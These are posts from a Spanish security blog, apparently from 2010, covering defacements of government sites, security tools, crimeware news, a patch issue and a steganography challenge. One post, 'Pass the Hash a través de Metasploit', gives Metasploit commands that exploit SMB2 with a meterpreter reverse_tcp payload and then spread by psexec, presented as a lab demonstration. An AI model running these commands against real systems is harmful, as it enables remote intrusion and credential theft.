A vueltas con lo mismo…

Hace un rato leía una noticia sobre un hacker que había saboteado el pasado mártes la página web del PSRM (Partido Socialista de la Región de Murcia).
En esta ocasión se trata del argentino 0v3r3x3 que dejó repetido una y otra vez el mensaje: 'Hacked by 0v3r3x3 Again... –.–. 0 Security, 99 Stupidity'.

Pero lo que hace más gracia de este asunto son algunos comentarios de la noticia:

- "Por fortuna, el ataque no tuvo graves consecuencias y sólo afectó a las noticias que aparecían en la portada de la página, que después tuvieron que volver a ser escritas."

- "El ataque fue subsanado pocas horas después por el equipo informático que gestiona habitualmente el portal, según informaron a esta redacción fuentes del PSOE."

Pero entonces, ¿por qué podemos seguir viendo esto?:





Hoy puede ser un defacer que simplemente advierta de los fallos de su web (gracias), mañana un cracker que robe información confidencial de carácter personal, o puede estar ya pasando...

Señores del gobierno: den ejemplo y mejoren la seguridad de sus sistemas. Esta es una crítica constructiva. ¡Den de una vez la importancia que se merece a la seguridad informática!

Aisla a "los malos" con Sandboxie

Muchas veces navegamos por sitios altamente sospechosos, evaluamos software o probamos programas que nosotros mismos no hemos compilado.

A parte de "cruzar los dedos", podemos estar más seguros si los ejecutamos en un espacio aislado y limitado de nuestro disco duro.

Sandboxie ejecuta los programas en un espacio aislado para prevenir que hagan cambios permanentes en otros programas y datos de tu ordenador.

El uso de Sandboxie y este tipo de aplicaciones, nos permitirá por tanto obtener ventajas como:

- Navegación web segura: el software malicioso descargado estará 'atrapado' en la sandbox y podrá ser descartado de forma trivial.

- Privacidad mejorada: el historial de navegación, las cookies y los ficheros cacheados temporales no podrán acceder a otras partes de Windows.

- Seguridad E-mail: los virus y otro software malicioso oculto en tu correo no podrá salir de la sandbox ni tampoco infectar su sistema real.

- Limpieza del sistema operativo: instala software aislado del sistema operativo impidiendo que Windows se 'deteriore'.

Insecure Magazine # 24 (Febrero 2010)

Ya podemos descargar la revista Insecure de Febrero.
Os dejamos el índice principal y nuestra recomendación para leerla:

- Escribir un cliente SOAP seguro con PHP: informe de campo de un proyecto real
- Cómo virtualizar la protección de los navegadores contra ataques web
- Revisión: 1Password3
- Preparar una estrategia para la detección de vulnerabilidades en las aplicaciones
- Amenazas 2.0: Una ojeada al futuro próximo
- Evitando que los documentos maliciosos comprometan las máquinas de Windows
- Balancear productividad y seguridad en un entorno mixto
- Análisis comparativo de AES y 3DES
- OSSEC: Una introducción a la administración de logs y eventos opensource
- Acceso seguro y distinguido en redes inalámbricas de la empresa
- Y MÁS!

Detienen al hacker que coló un video porno en pleno centro de Moscú

Moscú, 14 de Enero de 2010. Última hora de la tarde cuando muchos moscovitas volvían a casa desde su trabajo. De repente y en plena autopista, una pantalla de publicidad gigante (6x9 metros) mostraba un video porno durante algo más de 10 minutos.

Casi de inmediato se provocó un gran atasco a la entrada de un túnel, ya que los conductores frenaban para ver de nuevo el vídeo y algunos incluso grababan con sus teléfonos móviles ese momento.

Pues bien, esto que parece casi cómico y surrealista, sucedió de verdad y, recientemente, la Policía rusa ha detenido al 'hacker' que provocó tan curioso 'tinglao'.

El hombre, de 40 años y natural de Novorossíysk, reconoció su culpa y señaló que lo hizo para entretener a la gente, al tiempo que declaró en su defensa que no imaginaba que las imágenes iban a ser vistas por miles de personas en el centro de la capital rusa.

"Colgué el vídeo en el servidor de la pantalla publicitaria y pensé que sólo lo vería un pequeño número de personas, ya que suponía que el tablero electrónico se encontraba en una tienda. Mi intención era únicamente entretener a la gente que casualmente viera el vídeo", explicó.

La portavoz del departamento de ciberdelincuencia del ministerio del Interior de Rusia, Irina Zúbarieva, señaló que el hombre tiene antecedentes penales y fue juzgado en 1999 por falsificación de documentos.

Por su parte, el 'hacker', con formación técnica superior, que se definió como "usuario avanzado" de Internet, reconoció que no era la primera vez que accedía ilegalmente a un servidor y dijo que lo hacía por mera "curiosidad".

Curioso el señor, muy curioso X-)

Publicidad en contadores web gratuitos

En los últimos días, aquellos de vosotros que hayáis entrado a nuestro blog os habréis percatado de que cargaba (o intentaba cargar) un pop-up con publicidad:


Se trataba del gadget que utilizamos cómo contador de visitas en contadorweb.com.

Les hemos mandado un correo para preguntar y uno de sus administradores nos ha contestado amablemente que, efectivamente, han colocado algo de publicidad para mantener el servicio en marcha y que si no podíamos asumir el pop-up simplemente debíamos retirar el código.

Agradecemos la respuesta y lo bien que ha funcionado desde mediados de Diciembre del año pasado, pero no queremos un blog con publicidad y procedemos a quitarlo.

Aunque podríamos utilizar simplemente Google Analytics, queremos seguir manteniendo un contador visible a los lectores, y ahora elegimos a StatCounter.com que ‘nos promete’ no añadir ads a nuestro blog (a parte de más funcionalidades), y empezamos el contador con el número de visitas anterior:


Esta situación nos ha hecho reflexionar sobre la proliferación de sitios que ofrecen servicios gratuitos a los blogs (no sólo de suministro de contadores de visitas) y que aprovechan para instalar código para la exposición de anuncios de redes publicitarias como cpxinteractive y otros formatos intrusivos, en general, con el desconocimiento de los propios bloggers.

La mayoría se cubren las espaldas con pliegos de condiciones que generalmente no leemos pero que conceden al proveedor el derecho ‘extra’ de insertar publicidad en tu blog. En el caso de www.contadorweb.com, ni siquiera he encontrado un texto con condiciones ¿?.

Moraleja: antes de añadir cualquier código de terceros a tú sitio, asegúrate de las condiciones (bueno, primero si tiene) y estate atento en el futuro…

Comodo Dragon, el primer navegador hecho por una empresa de seguridad

Recientemente Comodo, una empresa líder en al campo de la ciberseguridad y famosa sobretodo por su firewall personal, ha anunciado su nuevo navegador web, Comodo Dragon.

Al igual que Google Chrome, Comodo Dragon está basado en el Projecto open source de Chromium pero añade mejoras de cara a incrementar el nivel de seguridad y proteger la privacidad del usuario. Son sobretodo destacables su función de identificación de certificados SSL y el modo incógnito para controlar las cookies.

Si queréis probarlo no tenéis más que descargarlo:


Haciendo trampas con Cheat Engine

Cheat Engine es un escaneador de memoria open source que permite escanear rápidamente las variables de un programa y modificarlas.

Aunque también posee las funciones de un depurador, ensamblador/desensamblador, modificador de velocidad, creador de trainers y demás, podéis imaginar que principalmente se utiliza para hacer trampas en los juegos.

Su funcionamiento en este aspecto es sencillo:

- en primer lugar busca direcciones en memoria con el valor que le indiques (por ejemplo el número de puntos conseguidos hasta el momento en una partida)

- a continuación y dentro de los resultados de la primera búsqueda, vuelve a buscar el valor modificado (el número de puntos incrementado en la partida)

- una vez identificado la posición de la variable en concreto, se procede a su modificación para obtener los resultados deseados ;-)

Aunque hay mil tutoriales en la red, veamos rápidamente su funcionamiento con un ejemplo más gráfico. Para ello, nos creamos un juego flash en una web que nos ofrezca fácilmente esa posibilidad (una de las muchas existentes).


En este caso, nos creamos un divertido ‘shooter’ cuya protagonista es nuestra “queridísima” presidenta (¡hay que tomarse la vida con humor!):


Bien, ahora nuestro objetivo es conseguir una cantidad ‘indecente’ de puntos.

Un lustro con YouTube

Casi como queriendo tener un memorándum en nuestro blog, tampoco queríamos dejar pasar la oportunidad de recordar que, el pasado domingo 14 de Febrero, YouTube cumplió 5 años.

Se trata sin duda de una de las webs que han cambiado al mundo. Fue fundada en 2005 por Chad Hurley, Steve Chen y Jawed Karim, poco después comprada en Octubre de 2006 por Google y parece mentira que, en tan poco tiempo y hoy por hoy, reproduzca más de mil millones de vídeos a diario (¡cada segundo 45 personas pulsan el botón 'play' dentro de YouTube!).

Si queréis ver los mejores vídeos de YouTube en cada país, desde hace tiempo existe un servicio que mezcla YouTube con Google Maps: GeoBestOfYouTube (de momento limitado a 22 países).


Como veréis, la mayoría de los videos están relacionados con la música, el humor o el fútbol.
En tecnología podemos ver videos recientes relacionados con el iPad y Google Buzz y, a nivel 'exótico', en Israel podemos encontrar en el ranking mensual (130.472 visitas) un video de la NBA en el que Sergio Rodríguez responde "a su manera" a Anthony Johnson.

Por último, os dejo uno de los vídeos de seguridad informática más vistos. Se trata de un curioso bug y tiene (nada más y nada menos) 7.354.889 de reproducciones:

Afectado (otro) servidor de un Ministerio

Un día después de que una noticia alertara de que los servidores del Observatorio tecnológico del Ministerio de Educación estaban siendo utilizados para realizar phising, veíamos que, hasta hace tan sólo un momento, todo seguía igual:

Además y "gracias" a los crackers de Arabia Saudi (Claw, Mr.Sohayl y compañía), al acceder a la parte de descargas, nuestro navegador intentaba ejecutar un troyano en VBScript con un exploit para la vulnerabilidad MS06-014 que afecta al MDAC.

Parece que los administradores del Portal del Ministerio ya están con ello pero, sin duda, estamos totalmente de acuerdo con la Asociación de Internautas en que, de una vez por todas, el Gobierno debería ponerse la pilas en temas de seguridad informática.

De igual forma, recomendamos a los 'owners' de http://belleza-nutricion.net que revisen la seguridad de su Wordpress...


No queremos ser abogados del diablo pero Claw tiene razón cuando dice (y esto vale para todos):

[!] Where Is Your..! Security [!]

Spy Eye, la otra gran alternativa

Seguro que ya habéis oído hablar de SpyEye, uno de los nuevos reyes del Crimeware que lleva pegando fuerte desde su aparición a principios de año, haciendo sombra, rivalizando y amenazando incluso con sustituir al mismísimo Zeus (de hecho incluye una opción significativa: 'Kill Zeus').

Por menos de 500 euros, tienes ante ti un poderoso Framework C&C para reclutar y administrar toda una red de zombies.

Se presenta como un troyano con un binario de 60KB desarrollado por un tal 'magic' en C++, funciona en modo usuario o ring3, afecta a la mayoría de los sistemas operativos de Microsoft y cabe destacar sus funcionalidades de keylogger, robo de índole financiera y monitorización geográfica.

Os recomiedo echar un vistazo a este interesante análisis realizado por Jorge Mieres para su Malware Intelligence Blog.

Pantallazo azul después de actualizar XP

Parece que una de las actualizaciones de seguridad publicadas el pasado Mártes por Microsoft, concretamente el parche MS10-015 (correspondiente al KB977165 para el Kernel de Windows), está provocando que muchos usuarios de Windows XP vean sus sistemas reiniciados tras un (clásico) pantallazo azul.

Podéis ver el caso comentado en Microsoft Answers donde muchos usuarios reportan el problema con el siguiente BSOD (Blue Screen of Death):

PAGE_FAULT_IN_NONPAGED_AREA Technical Information: STOP: 0x00000050 (0x80097004, 0x00000001, 0x80515103, 0x00000000).

Si estáis entre los “afortunados” con este problema, podéis probar a desinstalar el hotfix hasta que Microsoft publique una ‘actualización de la actualización’:

1. Iniciar el equipo con la consola de recuperación
2. CHDIR $NtUninstallKB977165$\spuninst
3. BATCH spuninst.txt
4. Systemroot
5. Exit

También y dentro de la cadena de comentarios, sorprenden algunos informando que el fichero atapi.sys distribuido con la actualización está infectado por un rootkit. ¿Ha sido comprometida realmente la distribución oficial de parches de Microsoft? Por el momento parece que no. En un caso se trata de un sistema previamente infectado (hooked atapi.sys) y en el resto un falso positivo con el motor eSafe 7.0.17.0.

Microsoft y medio mundo seguirá investigando, y nosotros seguiremos atentos.

Reto 2: llega el carnaval

Llegan las fechas del carnaval, un festival popular de color y disfraces donde podrás ser lo que quieras.

Lo que te proponemos con este reto es que aproveches esta ocasión para disfrazarte de tramposo. Me explico:
Abajo tienes un mini juego flash ambientado en los carnavales de Cádiz. El objetivo es simple: tienes 99 segundos para conseguir 1000 puntos o más explotando los globos.

Evidentemente pronto te darás cuenta que, aunque los globos naranjas valgan 5 puntos, será imposible llegar a tal cifra en tan poco tiempo.
Conclusión: es necesario hacer trampas. Si lo consigues, se mostrará una pantalla indicando que has superado el reto y una palabra clave.





Por favor, no añadáis la solución en los comentarios.

Mándanos la clave incluida en la imagen mostrada cuando se supera el reto, así como el procedimiento seguido a:

Listaremos todos los ganadores cuando publiquemos la solución (prevista en Marzo).

Nota: No basta con decompilar el flash y ver la imágen/clave del frame correspondiente. Recordar el objetivo: conseguir 1000 puntos. Tener en cuenta que en muchos sitios los juegos flash están protegidos y no pueden descargarse (php, shells,...) por lo que es necesario aumentar la puntuación "al vuelo" (esto puede ser también una pista ;-)).

¡Buena suerte y feliz carnaval!

Pass the Hash a través de Metasploit

Hace ya algún tiempo, tras leer el articulo Explotando Windows SMB2 a través de Metasploit, me dispuse a realizar pruebas de la técnica ya conocida 'Pass the Hash' dentro de un dominio de prueba con Active Directory 2003. Como ya sabemos, en la mayoría de las organizaciones el usuario Administrador local de máquina suele tener la misma contraseña en todos los equipos clientes.

Lo primero que haremos será aprovecharnos del fallo de seguridad en la implementación del protocolo SMB2 de Windows para iniciar una sesión meterpreter. Con esa sesión y tras ejecutar el comando 'hashdump' obtendremos un volcado de los hashes de todos los usuarios locales. Para ello, lo vamos a realizar a través de la consola de Metasploit y siguiendo los pasos indicados en el articulo
Explotando Windows SMB2 a través de Metasploit.

Una vez realizados los tres primeros pasos del artículo, ejecutamos el exploit:

msf auxiliary(version) > use exploit/windows/smb/smb2_negotiate_func_index
msf exploit(smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
set msf exploit(smb2_negotiate_func_index) > set LPORT 5678LPORT => 5678
msf exploit(smb2_negotiate_func_index) > set LHOST xx.xx.xx.xLHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > set RHOST xx.xx.xx.xRHOST => xx.xx.xx.x
msf exploit(smb2_negotiate_func_index) > exploit

Como podemos observar ya tenemos el hash del usuario Administrador local. Lo siguiente sería ejecutar el exploit Windows/smb/psexec:

Establecemos las opciones en el exploit psexec como vemos a continuación indicando el SMBUser y el SMBPass:

Y por último solo quedaría ejecutar el exploit en varias de las máquinas dentro del dominio:

Como podemos comprobar, obtenemos rápidamente varias sesiones de meterpreter en varias de las máquinas.

¿Un hacker? intenta robar a Ronalhinho

Leyendo hoy el periódico Marca descubría un curioso titular: "Piden cuatro años de prisión por intentar robar 800.000 euros a Ronaldinho".

Se trata de un tal Ewerton C.R., acusado de intentar sustraer 800.000 euros de una cuenta de Ronaldinho después de acceder a ellas tras hacerse con el e-mail del hermano del jugador y usar la de su hermana Deisi.

El fiscal asegura que el acusado se hizo con el correo del hermano y representante del futbolista, Roberto de Assis gracias a la tarjeta de visita y acceder al mail respondiendo las preguntas de seguridad. Además de los números del jugador, también habría accedido a las direcciones electrónicas de la madre del jugador, Miguelina de Assis, y de su hermana, sobre las que tomó el control del mismo modo y aprovechó una de las frecuentes transferencias que se realizaban

No obstante, en ese momento el saldo de la cuenta era de 35.000 euros y el banco la denegó, por lo que el acusado envió otro mensaje aceptando la transferencia por dicha cantidad. Su objetivo no cuajó ya que la hermana de Ronaldinho se percató de la operación y se anuló el movimiento bancario. La Fiscalía pide tres años y nueve meses de cárcel así como la multa de 12.240 euros por un delito de descubrimiento de secretos, otro falsificación de documentos y uno estafa.

Esto nos hace reflexionar sobre la importancia en la elección de las preguntas para resetear nuestras contraseñas y sobre el sensacionalismo de la prensa, que sigue utilizando el término hacker con demasiada soltura:

  • Un hacker trata de robarle 800.000 euros a Ronaldinho (Mundo Deportivo)
  • Un hacker intenta robar cerca de un millón de euros a Ronaldinho metiéndose en sus cuentas bancarias a través de Internet (Eurosport)
  • Un 'hacker' ataca las cuentas de la familia del jugador y trata de estafar 800.000 euros (La Vanguardia)
  • Hacker caught accessing bank account of AC Milan star Ronaldinho (Tribalfootball)
  • Hacker Caught Allegedly Trying To Defraud Milan's Ronaldinho (Goal.com)
  • etc, etc..

Sigue en directo el segundo Security Blogger Summit

Hoy (jueves 4 de febrero de 2010) es el gran día del segundo Security Blogger Summit, un encuentro de bloggers de seguridad cuya temática de este año girará alrededor de la seguridad para los internautas.

Ponentes:
  • Kurt Weismer, reconocido líder de opinión en seguridad, autor del blog Anti-virus Rants.
  • Brian Krebs, periodista de investigación y editor de Krebs on Security. De 2005 hasta diciembre de 2009, Krebs ha trabajado para el prestigioso periódico The Washington Post.
  • Marcelo Rivero, fundador y líder de Infospyware.
  • Joseph Menn, conocido periodista de Financial Times Estados Unidos y autor del libro recién publicado sobre cibercrimen "Fatal System Error: The Hunt for the New Crime Lords Who are Bringing Down the Internet".
  • Yago Jesús, experto en seguridad y miembro de Security by Default.
  • Alejandro Suárez, uno de las personas más influyentes de Internet y presidente de Ocio Networks, Grupo Publispain, Inversora Foley y fundador de Yes.fm. También cuenta con su blog profesional.
  • Marc Cortés, experto en marketing electrónico, comunicación y social media. Fundador y co-organizador de cava&twitts, autor del blog Interactividad.
  • Javier Sanz, al frente de uno de los sitios más visitados de tecnología de nuestro país, ADSLzone.
  • Paloma Llaneza en representación del CNCCS, es Socio Director de Razona Legaltech y Presidenta de AEDEL (Asociación Española de Evidencias Electrónicas).
  • John Leyden, corresponsal de seguridad para el sitio web de noticias tecnológicas The Register, en el que ha trabajado durante 10 años.
Agenda:
  • 18:00 horas: Apertura de puertas. Acreditación.
  • 18:30 – 18:45: Introducción del SBS e invitados. Keynote de Brian Krebs
  • 18:45 – 19:45: Mesa Redonda. Temas:
- Estado de la industria de seguridad: situación de los cibernautas
- Principales amenazas para la comunidad internauta y acciones de concienciación/educación
  • 19:45 – 20:00: Coffee Break & networking
  • 20:00 – 21:00: Mesa Redonda. Temas:
- Regulación versus privacidad
- Tecnologías e iniciativas emergentes en la lucha contra el cibercrimen
- Turno de preguntas
  • 21:00: Cocktail/cena & networking

Retransmisión

La emisión será en directo por video streaming a las 18:00 PM (GMT +1) permitiendo elegir el idioma (castellano e inglés):


zzuf o un fuzzer multipropósito

zzuf es un fuzzer de aplicación transparente y, como tal, sirve para encontrar bugs en aplicaciones corrompiendo los datos de entrada del usuario (los cuales a menudo llegan desde fuentes no confiables en Internet).

Funciona interceptando las operaciones de ficheros y red y cambiando bits aleatoriamente en la entrada del programa.
zzuf tiene un comportamiento causa-efecto, haciendo más fácil reproducir bugs.

Sus principales áreas de uso son:

  • Garantía de calidad: utilización de zzuf para probar software existente, o integrarlo dentro de una suite de pruebas propia.
  • Seguridad: a menudo los fallos de segmentación o corrupciones de memoria significan un agujero de seguridad potencial, zzuf ayuda a descubrir alguno de ellos.

Principalmente, los objetivos de zzuf son los reproductores multimedia, los visores de imágenes y los navegadores web ya que, debido a su naturaleza inherente, procesan los datos de manera insegura. No obstante, zzuf también sirve para encontrar fallos en utilidades de sistema como objdump.

Podéis encontrar más información en la web oficial: http://caca.zoy.org/wiki/zzuf.

Solución al reto 1 del muñeco de nieve

Ha llegado el momento de presentamos la solución al reto del muñeco de nieve, un sencillo desafío con el que queríamos introducir al personal en el fascinante mundo de la esteganografía.

Comenzando desde el principio, deciros (por si hay algún despistado) que la esteganografía es el arte de transmitir información de modo que la presencia de la misma pase inadvertida, típicamente escondida dentro un texto o una imagen. Proviene de las palabras griegas steganós (cubierto) y graptos (escrito), literalmente escrito cubierto, en el sentido de escondido.

Bien, pues precisamente escondido guarda un secreto nuestro simpático muñeco de nieve y nuestra misión es desvelarlo.

Nos ponemos manos a la obra y en primer lugar descargamos las imágenes, primero la original (muñecodenieve1.jpg) y posteriormente la modificada (muñecode
nieve2.jpg).

Lo primero que observamos a simple vista es que la imagen con el texto oculto tiene un tamaño mayor, concretamente 0,9KB.

Esto puede evidenciar que el método seguido para ocultar la información ha sido de inyección en lugar de técnicas como la del bit menos significativo (LSB)
que no incrementarían el tamaño del original.

Estegoanálisis manual

A continuación y dado que tenemos el fichero original (sin modificaciones) podemos realizar en primera instancia un estegoanálisis manual que, como su nombre indica, consiste en buscar de forma manual diferencias entre el fichero original y el ‘esteganografíado’, identificando cambios en la estructura para localizar datos ocultos.

Pero antes de compararlos, aprovechando que tenemos los ficheros abiertos con nuestro editor hexadecimal favorito y, como además somos bastante desconfiados, comprobaremos si realmente se trata de una imagen con formato jpg.

Observamos el valor FF D8, que indica el comienzo de un fichero de imagen jpg. Normalmente estos dos bytes bastan para certificar que se trata realmente de un jpg, por lo que parece que no nos han engañado. Los siguientes bytes indican el fabricante de la aplicación y corresponden al formato típico de un jpg:

Y además al final del fichero observamos los bytes FF D9, que precisamente nos indican el final de la imágen "end of JPG file".

Continuamos con el análisis de ambos ficheros y, comparándolos, observamos que al final de la segunda imagen modificada se evidencia claramente la presencia de datos ocultos. Además aparecen múltiples bytes 20 (espacio) que podrían indicar un buffer vacío.

Ya sabemos que se trata de una imagen jpg y que la herramienta utilizada para ocultar el texto en la imagen ha inyectado al final del fichero (algoritmo EOF) un buffer en el que se encuentra la información oculta que queremos desvelar.